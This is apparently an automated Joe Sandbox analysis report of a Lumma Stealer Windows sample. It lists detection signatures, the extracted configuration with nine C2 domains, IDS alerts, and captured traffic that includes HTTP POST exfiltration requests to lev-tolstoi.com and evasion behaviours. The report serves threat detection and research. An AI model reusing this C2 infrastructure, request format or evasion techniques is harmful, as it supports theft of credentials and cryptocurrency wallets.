Edit tour

Windows Analysis Report
6GNqkkKY0j.exe

Overview

General Information

Sample name:	6GNqkkKY0j.exe renamed because original name is a hash value
Original sample name:	1778a174a471fdec99c35907f2267d30.exe
Analysis ID:	1580874
MD5:	1778a174a471fdec99c35907f2267d30
SHA1:	4867feba972b8cab9eb49ce4421b88193bff2d0b
SHA256:	eb58db1db82012e283903925b9f45c73ff3427ef522c853bc286ed9e395924a9
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected potential crypto function

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

6GNqkkKY0j.exe (PID: 3500 cmdline: "C:\Users\user\Desktop\6GNqkkKY0j.exe" MD5: 1778A174A471FDEC99C35907F2267D30)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "bashfulacid.lat",
    "wordyfindy.lat",
    "observerfry.lat",
    "tentabatte.lat",
    "shapestickyr.lat",
    "curverpluch.lat",
    "talkynicer.lat",
    "slipperyloo.lat",
    "manyrestro.lat"
  ],
  "Build id": "LOGS11--LiveTraffic"
}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6GNqkkKY0j.exe PID: 3500	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 6GNqkkKY0j.exe PID: 3500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6GNqkkKY0j.exe PID: 3500	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.635190+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T12:45:13.220468+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	172.67.157.254	443	TCP
2024-12-26T12:45:17.364608+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	172.67.157.254	443	TCP
2024-12-26T12:45:39.157288+0100	2028371	3	Unknown Traffic	192.168.2.5	49743	172.67.157.254	443	TCP
2024-12-26T12:46:09.245417+0100	2028371	3	Unknown Traffic	192.168.2.5	49809	172.67.157.254	443	TCP
2024-12-26T12:46:39.778813+0100	2028371	3	Unknown Traffic	192.168.2.5	49874	172.67.157.254	443	TCP
2024-12-26T12:46:41.837953+0100	2028371	3	Unknown Traffic	192.168.2.5	49880	172.67.157.254	443	TCP
2024-12-26T12:46:44.081164+0100	2028371	3	Unknown Traffic	192.168.2.5	49886	172.67.157.254	443	TCP
2024-12-26T12:46:45.403758+0100	2028371	3	Unknown Traffic	192.168.2.5	49888	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.034199+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.157.254	443	TCP
2024-12-26T12:45:37.418008+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.034199+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49705	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:37.418008+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:08.672427+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.5	54923	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:08.327464+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.5	59766	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:07.895129+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.5	52215	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:08.042861+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.5	50742	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:07.748559+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.5	52446	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:08.182814+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.5	57456	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:08.511094+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.5	60516	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:07.607341+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.5	60595	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:46:07.424139+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49743	172.67.157.254	443	TCP
2024-12-26T12:46:38.126992+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49809	172.67.157.254	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:11.455460+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	23.55.153.106	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 6GNqkkKY0j.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://lev-tolstoi.com/pi9	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ee	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/9	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/4	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/A	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/Q	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api4&	Avira URL Cloud: Label: malware

Found malware configuration

Source: 6GNqkkKY0j.exe.3500.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "wordyfindy.lat", "observerfry.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "talkynicer.lat", "slipperyloo.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: 6GNqkkKY0j.exe	Virustotal: Detection: 52%			Perma Link
Source: 6GNqkkKY0j.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 6GNqkkKY0j.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: LOGS11--LiveTraffic

Source: 6GNqkkKY0j.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49888 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:54923 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:60595 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:52446 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:57456 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:50742 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:60516 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:52215 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:59766 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49743 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49809 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: manyrestro.lat

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49743 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49880 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49886 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49874 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49888 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YXHVYIT847QELZEBSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T5B0SDDXPB8XPSJITUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
